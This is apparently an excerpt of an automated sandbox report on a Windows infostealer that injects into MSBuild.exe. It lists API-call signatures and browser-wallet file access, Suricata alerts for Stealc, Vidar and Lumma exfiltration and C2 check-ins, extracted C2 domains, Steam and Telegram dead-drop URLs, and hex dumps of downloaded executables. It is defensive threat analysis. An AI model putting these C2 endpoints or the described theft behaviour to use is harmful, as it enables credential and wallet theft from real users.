Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0041547D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	5_2_0041547D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00409CF1 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00409CF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00414D08 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	5_2_00414D08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040D59B FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040D59B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B5B4 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	5_2_0040B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040BF22 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	5_2_0040BF22
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040B914 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	5_2_0040B914
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_00415B4D GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	5_2_00415B4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 5_2_0040CD0C wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	5_2_0040CD0C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 15_2_002E9ABF FindFirstFileExW,	15_2_002E9ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 5_2_00415182 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

5_2_00415182

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	4_2_0037E385
Source: C:\Users\user\Desktop\VmRHSCaiyc.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	4_2_0037E385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	5_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	5_2_004014AD
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	15_2_00328051
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	15_2_0032A0B9
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	15_2_003182E8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	15_2_0033E318
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	15_2_0031A3BF
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	15_2_003443F8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	15_2_00338528
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	15_2_003445E8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00342601
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	15_2_0032665F
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, ebx	15_2_0031264D
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	15_2_0032A687
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	15_2_003407F8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	15_2_00330813
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	15_2_0031A86A
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp dword ptr [0044FDB4h]	15_2_00312849
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	15_2_003468A8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	15_2_0031C89C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0033093D
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	15_2_00302928
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_0030E914
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_0030E9A5
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	15_2_00346A38
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	15_2_0031AA47
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	15_2_00324AD8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	15_2_0030EAC6
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	15_2_0033CB36
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	15_2_00330B22
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	15_2_0030CB78
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	15_2_00330B43
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00346BB8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	15_2_00346BB8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	15_2_0032AC81
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	15_2_00324D38
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	15_2_0030ED6B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00322D48
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	15_2_00308D88
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_0033CE48
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [edx], 0000h	15_2_0031CEB7
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp ecx	15_2_00342EAE
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	15_2_00344E98
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00344E98
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_00326EC4
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	15_2_0032CF30
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_00330F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	15_2_00330F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	15_2_00340F18
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp ecx	15_2_00342F6C
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	15_2_00310F6F
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	15_2_0031F138
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [esi], ax	15_2_0031F138
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov ebp, eax	15_2_003071D8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0032F2B8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	15_2_00343290
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	15_2_003293AF
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	15_2_00343390
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	15_2_0031340E
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	15_2_00305468
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	15_2_0032B56A
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	15_2_0031F540
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	15_2_003436C7
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 27BAF212h	15_2_00343833
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	15_2_00325824
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	15_2_00301878
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	15_2_00341918
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	15_2_0032DA58
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp word ptr [eax+esi+02h], 0000h	15_2_0032BB20
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov word ptr [edx], ax	15_2_00327B69
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_00327B48
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C85F7986h	15_2_00329BA8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp eax	15_2_00325C1B
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00345C62
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then cmp byte ptr [ebx], 00000000h	15_2_00313CBA
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov edi, ecx	15_2_00311D02
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	15_2_00303D78
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	15_2_0030DDC4
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	15_2_00313E69
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov ecx, dword ptr [edx]	15_2_002FDED8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then dec ebx	15_2_0033BF08
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0032FF74
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then jmp ecx	15_2_00305FB0
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00309FE8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	15_2_00309FE8
Source: C:\ProgramData\HCFIIIJJKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	15_2_0032FFD5

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.7:49853 -> 95.164.90.97:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.7:49853
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.7:49853
Source: Network traffic	Suricata IDS: 2056514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frizzettei .sbs) : 192.168.2.7:51900 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056524 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wickedneatr .sbs) : 192.168.2.7:52606 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exemplarou .sbs) : 192.168.2.7:61961 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056518 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (isoplethui .sbs) : 192.168.2.7:62836 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056516 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (invinjurhey .sbs) : 192.168.2.7:61484 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056520 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (laddyirekyi .sbs) : 192.168.2.7:59173 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exilepolsiy .sbs) : 192.168.2.7:60201 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.7:49989 -> 45.132.206.251:80
Source: Network traffic	Suricata IDS: 2056502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bemuzzeki .sbs) : 192.168.2.7:55998 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.7:49990 -> 104.21.53.8:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.7:49990 -> 104.21.53.8:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: laddyirekyi.sbs
Source: Malware configuration extractor	URLs: frizzettei.sbs
Source: Malware configuration extractor	URLs: bemuzzeki.sbs
Source: Malware configuration extractor	URLs: exemplarou.sbs
Source: Malware configuration extractor	URLs: invinjurhey.sbs
Source: Malware configuration extractor	URLs: isoplethui.sbs
Source: Malware configuration extractor	URLs: exilepolsiy.sbs
Source: Malware configuration extractor	URLs: wickedneatr.sbs
Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor	URLs: https://t.me/maslengdsa

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:39 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:44 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 02:24:45 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 